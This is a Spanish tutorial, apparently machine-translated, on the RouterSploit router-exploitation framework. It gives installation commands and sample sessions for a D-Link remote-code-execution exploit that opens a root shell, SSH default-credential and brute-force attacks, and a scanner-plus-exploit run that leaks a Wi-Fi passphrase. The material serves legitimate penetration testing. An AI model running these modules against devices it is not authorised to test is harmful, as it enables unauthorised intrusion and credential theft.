Routersploit, Analiza tu Router en Busca de Vulnerabilidades y Lanza el Exploit

 

RouterSploit es un completo framework que nos permitirá comprobar la seguridad de nuestros routers, puntos de acceso, NAS y otros dispositivos embebidos. Este framework es completamente gratuito y de código libre, por lo que podremos modificarlo para que cumpla con nuestras necesidades.

Se compone de varios módulos que realizan pruebas de pruebas de penetración:

Exploits: Es el módulo encargado de explotar las vulnerabilidades encontradas en un dispositivo, como por ejemplo un router.

 

Creds: Es un módulo diseñado específicamente para probar credenciales por defecto de un router, e intentar entrar directamente en su administración.

 

Scanners: Es un módulo diseño para buscar y encontrar objetivos vulnerables, al reconocer un objetivo, nos mostrará si es vulnerable a algún exploit que tengamos en el módulo de Exploits.Instalación

requisitos

  • gnureadline (sólo OSX)
  • peticiones
  • paramiko
  • beautifulsoup4
  • pysnmp

La instalación en Kali

git clone https://github.com/reverse-shell/routersploit

cd routersploit

./rsf.py

Instalación en Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git

git clone https://github.com/reverse-shell/routersploit

cd routersploit

pip install -r requirements.txt

./rsf.py

Instalación en OSX

git clone https://github.com/reverse-shell/routersploit

cd routersploit

sudo easy_install pip

sudo pip install -r requirements.txt

./rsf.py

Que se ejecuta en acoplable

git clone https://github.com/reverse-shell/routersploit

cd routersploit

docker build -t routersploit:latest -f Dockerfile .

./run_docker.sh

Actualizar

Actualización RouterSploit Marco menudo. El proyecto se encuentra en fase de desarrollo pesado y nuevos módulos se envían casi todos los días.

cd routersploit

git pull

Uso

root@kalidev:~/git/routersploit# ./rsf.py

______            _            _____       _       _ _

| ___ \          | |          /  ___|     | |     (_) |

| |_/ /___  _   _| |_ ___ _ __\ `–. _ __ | | ___  _| |_

|    // _ \| | | | __/ _ \ ‘__|`–. \ ‘_ \| |/ _ \| | __|

| |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_

\_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|

| |

Router Exploitation Framework   |_|

 

Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)

Codename : Wildest Dreams

Version  : 1.0.0

 

rsf >

  1. Los exploits

Escoja el módulo

rsf > use exploits/

exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/

rsf > use exploits/dlink/dir_300_600_rce

rsf (D-LINK DIR-300 & DIR-600 RCE) >

Puede utilizar la tecla de tabulación para su conclusión.

opciones

Opciones del módulo de visualización:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

 

Target options:

 

 

Name       Current settings     Description

—-       —————-     ———–

target                          Target address e.g. http://192.168.1.1

port       80                   Target Port

Determinar las opciones:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1

[+] {‘target’: ‘http://192.168.1.1’}

módulo de ejecutar

Puede explotar el objetivo mediante la emisión de la ‘carrera’ o ‘explotar’ comando:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run

[+] Target is vulnerable

[*] Invoking command loop…

cmd > whoami

root

También es posible comprobar si el objetivo es vulnerable a explotar en particular:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check

[+] Target is vulnerable

información

Mostrar información acerca de explotar:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

 

Name:

D-LINK DIR-300 & DIR-600 RCE

 

Description:

Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

 

Devices:

– D-Link DIR 300

– D-Link DIR 600

 

Authors:

– Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery

– Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

 

References:

– http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router

– http://www.s3cur1ty.de/home-network-horror-days

– http://www.s3cur1ty.de/m1adv2013-003

  1. Creds

recoger módulo

Módulos ubicados en el creds/directorio permite la ejecución ataques de diccionario contra varios servicios de red.

Los siguientes servicios que actualmente son compatibles:

  • ftp
  • ssh
  • telnet
  • http autenticación básica
  • HTTP Digest autenticación
  • forma http auth
  • SNMP

Cada servicio se ha dividido en dos módulos:

  • por defecto (por ejemplo ssh_default) – este tipo de módulos utilice una lista de palabras con las credenciales predeterminadas combinaciones de usuario: contraseña. El módulo puede ser utilizado de forma rápida y en cuestión de segundos puede verificar si el dispositivo utiliza las credenciales predeterminadas.
  • fuerza bruta (por ejemplo ssh_bruteforce) – este tipo de módulos de realizar ataques de diccionario contra una cuenta o una lista de cuentas especificadas. Se necesitan dos parámetros: usuario y contraseña. Estos valores pueden ser una sola palabra (por ejemplo ‘admin’) o una lista completa de las cadenas (archivo: ///root/users.txt).

Consola:

rsf > use creds/

creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default

creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce

rsf > use creds/ssh_default

rsf (SSH Default Creds) >

opciones

rsf (SSH Default Creds) > show options

 

Target options:

 

Name       Current settings     Description

—-       —————-     ———–

target                          Target IP address

port       22                   Target port

 

 

Module options:

 

Name         Current settings                                                      Description

—-         —————-                                                      ———–

threads      8                                                                     Numbers of threads

defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

Poner un objectivo:

rsf (SSH Default Creds) > set target 192.168.1.53

[+] {‘target’: ‘192.168.1.53’}

módulo de ejecutar

rsf (SSH Default Creds) > run

[*] Running module…

[*] worker-0 process is starting…

[*] worker-1 process is starting…

[*] worker-2 process is starting…

[*] worker-3 process is starting…

[*] worker-4 process is starting…

[*] worker-5 process is starting…

[*] worker-6 process is starting…

[*] worker-7 process is starting…

[-] worker-4 Authentication failed. Username: ‘3comcso’ Password: ‘RIP000’

[-] worker-1 Authentication failed. Username: ‘1234’ Password: ‘1234’

[-] worker-0 Authentication failed. Username: ‘1111’ Password: ‘1111’

[-] worker-7 Authentication failed. Username: ‘ADVMAIL’ Password: ‘HP’

[-] worker-3 Authentication failed. Username: ‘266344’ Password: ‘266344’

[-] worker-2 Authentication failed. Username: ‘1502’ Password: ‘1502’

 

(..)

 

Elapsed time:  38.9181981087 seconds

[+] Credentials found!

 

Login     Password

—–     ——–

admin     1234

 

rsf (SSH Default Creds) >

  1. Escáneres

Escáneres le permiten verificar rápidamente si el objetivo es vulnerable a cualquier hazañas.

recoger módulo

rsf > use scanners/dlink_scan

rsf (D-Link Scanner) > show options

opciones

Target options:

 

Name       Current settings     Description

—-       —————-     ———–

target                          Target address e.g. http://192.168.1.1

port       80                   Target port

Poner un objectivo:

rsf (D-Link Scanner) > set target 192.168.1.1

[+] {‘target’: ‘192.168.1.1’}

módulo de ejecutar

rsf (D-Link Scanner) > run

[+] exploits/dlink/dwr_932_info_disclosure is vulnerable

[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable

[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable

[-] exploits/dlink/dns_320l_327l_rce is not vulnerable

[-] exploits/dlink/dir_645_password_disclosure is not vulnerable

[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable

[-] exploits/dlink/dir_300_600_rce is not vulnerable

 

[+] Device is vulnerable!

– exploits/dlink/dwr_932_info_disclosure

Se ha comprobado que el objetivo es vulnerable a dwr_932_info_disclosure explotar. Ahora usa el módulo adecuado y explotar diana.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure

rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1

[+] {‘target’: ‘192.168.1.1’}

rsf (D-Link DWR-932 Info Disclosure) > exploit

[*] Running module…

[*] Decoding JSON value

[+] Exploit success

 

Parameter                  Value

———                  —–

get_wps_enable             0

wifi_AP1_enable            1

get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0

wifi_AP1_ssid              dlink-DWR-932

get_mac_address            c4:00:f5:00:ec:40

wifi_AP1_security_mode     3208,8

wifi_AP1_hidden            0

get_mac_filter_switch      0

wifi_AP1_passphrase        MyPaSsPhRaSe

get_wps_mode               0

Licencia

El Marco RouterSploit está bajo una licencia BSD. Por favor, vea LICENCIA para más detalles.
DESCARGA:

 

https://github.com/reverse-shell/routersploit

Leave a Comment